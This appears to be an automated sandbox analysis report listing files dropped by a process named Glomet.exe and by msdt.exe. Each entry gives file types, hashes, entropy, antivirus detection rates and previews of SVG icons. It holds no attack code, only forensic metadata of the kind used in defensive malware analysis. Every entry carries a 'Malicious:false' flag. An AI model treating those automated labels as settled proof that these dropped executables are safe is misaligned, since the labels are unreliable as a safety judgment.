                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10047
                                                                                                                                                                            Entropy (8bit):7.907326378703077
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:oXRaW9Fx3fNTzZJb0EXG/E5ziOld0GZen6gVCNYlaqeTpq3RSHzmEZjcGK09vJ2R:KRbFx9wEXIE5GOleGZeoWvelq+zmEll4
                                                                                                                                                                            MD5:CB3AC474E2A0B2000C9FA1C77302A819
                                                                                                                                                                            SHA1:98AC5372A0747F091D725ADEEA8B3B75B635B943
                                                                                                                                                                            SHA-256:281E55D419499196EC9848E3CCED72A3F7A5E86FA7402F4EB970962C47FAB090
                                                                                                                                                                            SHA-512:3A32310A064E7F718E95A861A5903BF9D83C0E98F550E731871FDA6F16CAF5410D17D2F7766303DFB114BE1443A246D0949E79C98C6C8639E7A54E37B34D5383
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):121302
                                                                                                                                                                            Entropy (8bit):7.027796741277164
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:u8H3kQe/WmaSGweq0e/r5e54MXw2oM+uZCqpaH:Z3kl2SaeoLw2o3Yp6
                                                                                                                                                                            MD5:11025BC5B46BDF5F72FFA2E5291BC3A2
                                                                                                                                                                            SHA1:EE04A8B3B1FD1351F3BC0233E57C896A0D1A45D8
                                                                                                                                                                            SHA-256:A5E4312E6884158B29C7A93A7583E29094472C9AEA17D9C406D0FFA10A89650F
                                                                                                                                                                            SHA-512:7684DC196B17C8524D72F73BAE3FD9A0DEFAA3955F4BB223560039C036763D8BA54223C655BFD9540FB767EFC514139CA5B737458158AB4F600D65C93B5D4A11
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):18696
                                                                                                                                                                            Entropy (8bit):7.1338859952744516
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:rWW1hWv4wm0GftpBjgpm3SSP9lndaYhpwe/:ReFVi02vZ
                                                                                                                                                                            MD5:C9A55DE62E53D747C5A7FDDEDEF874F9
                                                                                                                                                                            SHA1:C5C5A7A873A4D686BFE8E3DA6DC70F724CE41BAD
                                                                                                                                                                            SHA-256:B5C725BBB475B5C06CC6CB2A2C3C70008F229659F88FBA25CCD5D5C698D06A4B
                                                                                                                                                                            SHA-512:ADCA0360A1297E80A8D3C2E07F5FBC06D2848F572F551342AD4C9884E4AB4BD1D3B3D9919B4F2B929E2848C1A88A4E844DD38C86067CACE9685F9640DB100EFB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24328
                                                                                                                                                                            Entropy (8bit):6.867867660778997
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/ZpFVhHW1hWxgYBm0GftpBjMm3SNlndaYhpn3p:boEVi6DBp
                                                                                                                                                                            MD5:D5166AB3034F0E1AA679BFA1907E5844
                                                                                                                                                                            SHA1:851DD640CB34177C43B5F47B218A686C09FA6B4C
                                                                                                                                                                            SHA-256:7BCAB4CA00FB1F85FEA29DD3375F709317B984A6F3B9BA12B8CF1952F97BEEE5
                                                                                                                                                                            SHA-512:8F2D7442191DE22457C1B8402FAAD594AF2FE0C38280AAAFC876C797CA79F7F4B6860E557E37C3DBE084FE7262A85C358E3EEAF91E16855A91B7535CB0AC832E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):296
                                                                                                                                                                            Entropy (8bit):6.971754190015909
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:6v/lhPysVQcvxPuNDvXIqFO2Ko4SX19QbWHKBtG6Qp3VOhr8Ja3O/bp:6v/7icpPuhP9O2Ko4SXDQL6pl9au1
                                                                                                                                                                            MD5:AB7A8A94E57531D1BB8C28C2498EB5FF
                                                                                                                                                                            SHA1:32733872A8D9704C83730E6366AFE490ECA4675B
                                                                                                                                                                            SHA-256:6E551C69C5C734D33635662F491802CC42497B1CB8C55C8810331FD61E838E47
                                                                                                                                                                            SHA-512:AC6B5B3D9F77367FB0BC49D0F2F5FF50CDA00DF7DF1E953CD3253403BF29B15BD89DB6FBDF3624CC0A0D156D196AA5750364772A879022AA4A0AB895D077228E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6689
                                                                                                                                                                            Entropy (8bit):5.135211840989561
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:VkjcMIy2+X2I2F2C2G2fH7y8cQaVB2nnuy1FQOcQaVv2q22L2k2s:mjcM7u8xaV8nnL1FQOxaVu6
                                                                                                                                                                            MD5:C96D0DD361AFC6B812BDDD390B765A26
                                                                                                                                                                            SHA1:71081F096719CAA70B9BAEF86FE642635D8E2765
                                                                                                                                                                            SHA-256:6690799E5FA3FB0DD6CCE4BAC5AA1607C8A6BB16507854A87520C7DE53052E1B
                                                                                                                                                                            SHA-512:7C73BC880A9401C64AB0571957B414180C1B94137C7BC870BA602979E7A990640A37991CB87A40BC7E5942A37FDA25EFC58C759C00F4344BA3D88B9AA64182DA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000036">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                            Entropy (8bit):6.506614984308849
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:6v/lhPysPUiNdXNmc5MKu1+7x0INpMIyrrjp:6v/7vRNRAKuE7x0cyt
                                                                                                                                                                            MD5:F83435B787A27592C81699512B3237D1
                                                                                                                                                                            SHA1:F440598B5B859E7572713EF8D864980C0970A60B
                                                                                                                                                                            SHA-256:C5D573D809E54302DE4D14F9CE8D9487F2E3332656C2F14E3CE24DCB0A18B18B
                                                                                                                                                                            SHA-512:0D47233D9A12789DAB794C7DDD0A6F44B66548DB2CFF036F22FCA61C83D704BA47690B74F1BEDBA7D5C85C1B0220FC598CE5E1D96F8A7B61DA7A7F8FC4758B25
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10408
                                                                                                                                                                            Entropy (8bit):7.906525417677416
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:oXRGoU3vTphbDt8uZJICYsi1VgBlTKBNpaWq7nnyTd/Jc9aW22vWRYf/:KRGn3HDCSzYsXBw3eELcvviYf/
                                                                                                                                                                            MD5:A0DFE28CCF8E332E0186AB6FF2CB3D11
                                                                                                                                                                            SHA1:82C095E53BA2E619387E1625C895BCBFCAEE30C3
                                                                                                                                                                            SHA-256:6E9BCA83901876A559145E7CDAEC5CCED1349B7E05B11949FC0DD04BF7F49487
                                                                                                                                                                            SHA-512:24D9FCC4D15DBB51B297E51CF34514D557A7D6C1ED36DD975B6952C85DF196DC776B727CC5811B2292A6648515B7FB4A231037363B0FED799A55001B3FBE3D62
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11064
                                                                                                                                                                            Entropy (8bit):6.711612160200339
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:s8WNxOWVr8VHwDDBQABJ304RGV+9N8qnajQzUmeJ:JWNxOWVr6wDDBRJ304RGVhl8zUmg
                                                                                                                                                                            MD5:18A5852C6BE281D5BD78384D0A27D505
                                                                                                                                                                            SHA1:FC6E98D9F2031DF335E252DB0CCB3DB478E31DCC
                                                                                                                                                                            SHA-256:B39443D909F3D94D1322BC1C386B8E5BEAD9C49C410DD436EFC48E8125A23ABF
                                                                                                                                                                            SHA-512:AC400D0AFEAC75BC6405B9240C2FCBE319B48A8837E5266827BBA8C5B44BE21FB9A97727C39CFAD1EB06C43D14F914F61C884DF8E357EDADD126D0F175C5B0A8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):919
                                                                                                                                                                            Entropy (8bit):4.466221099303822
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:2dPnnxu3tlHP2/RCbrB6DlzdMBTbD1tOi96jbON:cfne3B6VuDvObbON
                                                                                                                                                                            MD5:06EDD955BC906D8ED012C8DB40164053
                                                                                                                                                                            SHA1:459E73346A099E946F6024272E32B21012DE7274
                                                                                                                                                                            SHA-256:93977AFF7AA27CFEEC1EF855F32C40DA9D175831CE34A58F967178404F29BC8D
                                                                                                                                                                            SHA-512:A00A43799197FBB9F1CC301377800BD19008C323BF03EB3DD02059182192C7975CE0441A11F118F2147F663883E8CD15668E9BB2EEBB229B99CE33A71A9E43E5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 2 0 c -0.550781 0 -1 0.449219 -1 1 v 14 c 0 0.550781 0.449219 1 1 1 h 10 v -2 h -9 v -12 h 7.585938 l 2.414062 2.414062 v 2.585938 h 2 v -3 c 0 -0.265625 -0.105469 -0.519531 -0.292969 -0.707031 l -3 -3 c -0.1875 -0.1875 -0.441406 -0.292969 -0.707031 -0.292969 z m 5 8 v 2 h 4 c 1.117188 0 2 0.882812 2 2 v 4 h 2 v -4 c 0 -2.199219 -1.800781 -4 -4 -4 z m 0 0" fill-rule="evenodd"/>. <path d="m 9 5 c -0.277344 0 -0.527344 0.113281 -0.707031 0.292969 l -3.707031 3.707031 l 3.707031 3.707031 c 0.179687 0.179688 0.429687 0.292969 0.707031 0.292969 h 1 v -1 c 0 -0.277344 -0.113281 -0.527344 -0.292969 -0.707031 l -2.292969 -2.292969 l 2.292969 -2.292969 c 0.179688 -0.179687 0.292969 -0.429687 0.292969 -0.707031 v -1 z m 0 0"/>. </g>.</svg>.
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1092
                                                                                                                                                                            Entropy (8bit):5.190026674828756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CpV2rk5DtVloyKbRAecFxMGMaMOtMJPlfyIR:TtDoNtAecFJMLPlfyU
                                                                                                                                                                            MD5:A4F8EA7AC00083A482B8BAA66412235A
                                                                                                                                                                            SHA1:4C5EA7E6244E4E2324A4B622B7FEF0D92CEE67C3
                                                                                                                                                                            SHA-256:D7EEA31EF9ADB3308AAFE8D9FDAD0AC0BF8D6BC1B1150D16B31669F8A9C8D347
                                                                                                                                                                            SHA-512:D829D83F00CA434C97E2678B409DA70F92A3A65320783183D29C236E7CD7B48966D7AEA0F7890FAD966755A9E916F8097198D961225E4E29B6AA2EC890A4F4D3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2 0a1 1 0 00-1 1v9s-.014.459.23.947C1.475 11.436 2.167 12 3 12h1.832a1 1 0 00.326 0H13s.459.014.947-.23C14.436 11.525 15 10.833 15 10V6a1 1 0 00-1-1H5a1 1 0 00-1 1v4H3V2h2.586l1.707 1.707A1 1 0 008 4h5a1 1 0 100-2H8.414L6.707.293A1 1 0 006 0zm4 7h7v3H6z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal" color="#000" font-weight="400" font-family="sans-serif" overflow="visible" fill-rule="evenodd"/><path d="M2 5h1s0-1 1-1h6L7 1H2z" fill-rule="evenodd"/><path d="M5 6h9v5H5zm8-3h1v1h-1zm1 2h1v1h-1zM4 5h1v1H4zm-2.5 9h13c.277 0 .5.223.5.5v1c0 .277-.22
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):531
                                                                                                                                                                            Entropy (8bit):6.736727630535467
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7X0Z7HBwN1+swFIz4NqKod/yP3VFHCM0v9oQUs:C0BqE/NqX/kuUs
                                                                                                                                                                            MD5:A2AD58DFE6FC8AD236974230EFD9A6D0
                                                                                                                                                                            SHA1:D9691A9526D441F07F1948FB1563499E66AD75F7
                                                                                                                                                                            SHA-256:6ABF10548D28503337123DDB1483668B5E4F5ED6CE9AF6C958DEF5A6D76E15C6
                                                                                                                                                                            SHA-512:CC32EDE037DE2DA98D96C8D0B258F27AFD3C7CC7E4D6EBF8E9E092CF74846FC041DE014A344535D7996D6E602CD5B8A2E047E14A8ABB988171BAD02E6BEE804F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1503
                                                                                                                                                                            Entropy (8bit):5.15394138748218
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CBGMMAhONiWGzFk1wgaqV4AeW0WRjgnRcG1IoAeW0ayyKbRAecFxV0L:gMmklOV4AeIRjacYIoAeQyNtAecFu
                                                                                                                                                                            MD5:1C15A6D0FA6065F5004770EA2876B446
                                                                                                                                                                            SHA1:BFDB465A2FC2B8BA60FC9BEE5CB03D65156F1D20
                                                                                                                                                                            SHA-256:DC5A830CBB258F5B7EB5422C7059F6A0578821D9549A9603CA3C22E4749B6F80
                                                                                                                                                                            SHA-512:02309FE57B9CA42D65FA9C4B93FCB6A003D698D0FC47EF03EEFCDA0163B7C715FC6438A3CED7164839EED3412EC40BA1CF35B88AF0A40D7774B93BE7F1879F6C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" fill="#474747"><path d="M6 .05v2h6c.428 0 1 .613 1 1v1H8c-.92 0-1.735.383-2.25.968A3.017 3.017 0 005 7.049c.006.72.27 1.453.781 2.032.513.578 1.31.968 2.22.968h7v-7a3 3 0 00-3-3zm2 6h5v2H8c-.398 0-.567-.11-.719-.282a1.144 1.144 0 01-.28-.719 1.11 1.11 0 01.25-.718c.144-.166.327-.282.75-.282z" style="line-height:normal;-inkscape-font-specification:Sans;text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-size="xx-small" font-family="Sans" overflow="visible"/><path d="M4 15H3c-.265 0-.53-.093-.719-.281l-2-2L0 12.437v-.874l.281-.282 2-2C2.47 9.093 2.735 9 3 9h1v1c0 .265-.093.53-.281.719L2.438 12l1.28 1.281c.189.188.282.454.282.719v1z" style="line-height:normal;-inkscape-font-specification:'Bitstream Vera Sans';text-indent:0;text-align:start;text-decoration-line:none;text-transform:none;marker:none" font-family="Bitstream Vera Sans" overflow="visible"/>
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):665
                                                                                                                                                                            Entropy (8bit):4.455633152585391
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdPnnl/nu3tlnpZo4iL+o0JWlzkmvtoWlz9vtoWlzKzmdwWlzFzmdwWlM:2dPnnxu3tlTtiL+rJPmvto0vtojzmdw6
                                                                                                                                                                            MD5:D3329B3FDCE276378BC23A2B04EFF6FA
                                                                                                                                                                            SHA1:1DF694D08D03F1C7C86AB6234507A9364EC5C4E8
                                                                                                                                                                            SHA-256:0D26FB049E369AAD5E7ED901B3A255317A4A465008E89026FDE9F624124E2599
                                                                                                                                                                            SHA-512:2C4624461FAC6CD5093B8B7818DA17B909A302A216364ABCDD467131EA2C49E2BDCA3E546F69030E4812439F86986F747688EA0F9732CAE053F697A8C3F08B0D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11.707031 2.707031 l -1.414062 -1.414062 l -6.707031 6.707031 l 6.707031 6.707031 l 1.414062 -1.414062 l -5.292969 -5.292969 z m 0 0"/>. <path d="m 11 15 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 2 h 1 v -1 h -1 z m 0 0"/>. <path d="m 11 3 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. <path d="m 11 15 c 0.554688 0 1 -0.445312 1 -1 s -0.445312 -1 -1 -1 s -1 0.445312 -1 1 s 0.445312 1 1 1 z m 0 0"/>. </g>.</svg>.
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):813
                                                                                                                                                                            Entropy (8bit):4.179382815877168
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:t4CGf211LJnGKC2HKYVYmtPiCoPx9xCoPx9PiCoPx9xCoPx9Z5GulN:H1D9CF2ICofxCofaCofxCofWi
                                                                                                                                                                            MD5:9CC12578610A2319C0B94FD82AADEFDA
                                                                                                                                                                            SHA1:DB7CFE14B2BE0068FED279B51363D1810FAA71CF
                                                                                                                                                                            SHA-256:6A61D206C4FA4DF208EF0B6FE28ECF92DC55A370EB2EEA3049BFF7A0F469D62D
                                                                                                                                                                            SHA-512:383BC6013053A3F067B7D577D7BCDB8B5E7207D7586679BB238B66D87078C2A5E9D8DE87D03B31B2556669B4DA25411FD7EA7B2BCBAE974FFB2B719ACE7E0429
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.246 3c-.153 0-.256.073-.291.203L.26 11.824C.035 12.67 1.821 13.681 3 13l2.75-4h4.5L13 13c1.178.68 2.965-.33 2.738-1.176l-1.693-8.62c-.035-.131-.14-.204-.291-.204zM4.25 4h.5a.25.25 0 01.25.25V5h.75a.25.25 0 01.25.25v.5a.25.25 0 01-.25.25H5v.75a.25.25 0 01-.25.25h-.5A.25.25 0 014 6.75V6h-.75A.25.25 0 013 5.75v-.5A.25.25 0 013.25 5H4v-.75A.25.25 0 014.25 4zm7.214 0a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm-1 1a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm2 0a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5zm-1 1a.5.5 0 01.036 0 .5.5 0 01.5.5.5.5 0 01-.5.5.5.5 0 01-.5-.5.5.5 0 01.464-.5z" color="#000" overflow="visible" fill="#2e3436"/></svg>
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):195475
                                                                                                                                                                            Entropy (8bit):6.311646239368264
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:y6YP6gSQWAVNKXYWwwrA8j7S+rJkWAA+El7t7s98vh1ukZGSkW5QF3i:y9TBYA8jDrJjEEl7dsSv5wE5QF3i
                                                                                                                                                                            MD5:AB7B411DD06BFCDA8CBAD32D655E88C0
                                                                                                                                                                            SHA1:8EC6C8BF8B479FE712442FBB197E77557962C3ED
                                                                                                                                                                            SHA-256:13B0E129029141811EC8E7494E093F7B932CBF0E101CD059CCF50442F84137F0
                                                                                                                                                                            SHA-512:8B86A4F3C4A1DE72C5D7F043C73417792D598B272EA884B33CE9755F3D53551D050F4AD8D32C469AFA1166369D4C7E965A599B53657B3B889E98A7A67DE06E4B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):544
                                                                                                                                                                            Entropy (8bit):4.840636545565347
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:t4CDqsLWbjUzkTWem7+0qoLIGYJJufPm3ioprGDRl+i:t4CdLWbjUgSl8sfPAnrGDRlN
                                                                                                                                                                            MD5:6CD1ED8B1D8500C9A1480425DA4282D6
                                                                                                                                                                            SHA1:F1B935DD259BCD198784C1C2FA6516230624C43B
                                                                                                                                                                            SHA-256:FAD0ECD186B6DEC11FBB094876E7381B2A097E1EF9D641527E3295132410EF44
                                                                                                                                                                            SHA-512:6BC432608A3630136E2E8E44F69A81B9C5F9FE479DA5DD3E35A77168A66F3C41D72DC0E49FB623E74B9527CF031FBBBE447213CE4C0FDFDA4A9AB41043997701
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2.063 0A2.048 2.048 0 000 2.063v11.874C0 15.088.912 16 2.063 16h11.874A2.048 2.048 0 0016 13.937V2.063A2.048 2.048 0 0013.937 0zM2 3h2v4h1V3h2v10H5V9H4c-1 0-2-.842-2-2zm8 0h2c.833 0 1.525.564 1.77 1.053.244.488.23.947.23.947v1h-2V5h-2v6h2V9h-1V7h3v4s.014.459-.23.947C13.525 12.436 12.833 13 12 13h-2s-.459.014-.947-.23C8.564 12.525 8 11.833 8 11V5s-.014-.459.23-.947C8.475 3.564 9.167 3 10 3z" style="marker:none" color="#bebebe" overflow="visible" fill="#2e3436"/></svg>
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):718
                                                                                                                                                                            Entropy (8bit):7.267310509580342
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7maZB4RO4HE+swFIUyrlxSTWLCMpffTn0589Gug9Beu1qG6Fh1ClN:tak15ypxST1MpffTAjv9R1dujmN
                                                                                                                                                                            MD5:151CC83E1B8F2239625A521AD3889884
                                                                                                                                                                            SHA1:F6951B61B7BE182EE6493DD7CB02DDF5EBE2BCB3
                                                                                                                                                                            SHA-256:B698DFD02677369423FDA9D0A2C499A1B7788A4AA3D500D20E1DFBDC47E64599
                                                                                                                                                                            SHA-512:A23168D29CFF32344EEA6C2D2895FD8055C5318074C0EE34DCEEC391630350E98A9D8813736ADB49EE87D8B2F02FE219E08811F569887F846D400D92A66DD085
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55840
                                                                                                                                                                            Entropy (8bit):6.008705338773632
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:8BBwicLb8BQ+2IBft6q4Pro6tQ+/Gy9sKLAmIybD:8BWxP+rPePro6j/3sKLhD
                                                                                                                                                                            MD5:BCE3974EB6C6A535062A8D1EAF757513
                                                                                                                                                                            SHA1:1D1D167D8E4B93D40273A43CEBE2AEE5599802DF
                                                                                                                                                                            SHA-256:32CFB6C0DA4A3E91E1E99C50003637ED2C1A2102211FA5ACFA3A9FE3100A7B8D
                                                                                                                                                                            SHA-512:46F30B5217AAD17E63A1921E5E05B3560EABB0F8A17E3487A6E6BBF5A0E2297D711F632D3749963D0E5FA96398E21C5D06C7B3EFFBD97A3D196FDC88121B7F61
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):41530
                                                                                                                                                                            Entropy (8bit):3.999180462095621
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:DiaxmqDXVWovL0uIlEwE3b/nDqRF+pVqQ7pNzc4jS3Xzv:VZxvoPW3b/nwFKVqQ7pNrS3Dv
                                                                                                                                                                            MD5:8ED01FEB000559F0E18E19581A5B3245
                                                                                                                                                                            SHA1:5805E6418819B1B24070B60028A2BBC2D24B5AAC
                                                                                                                                                                            SHA-256:4B88075A532A4182CB052E2117ED0399E0E503480F9B644605C97BEF3E59FD72
                                                                                                                                                                            SHA-512:879E1577E17E3C6C1388457B2526F26B5FB391D6C1D6C4115A21310DB9C1E918B3BCB8635CD423F546D8304C11426E2A21EAE7230D11CCB88591AF71415F48F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                            Malicious:false
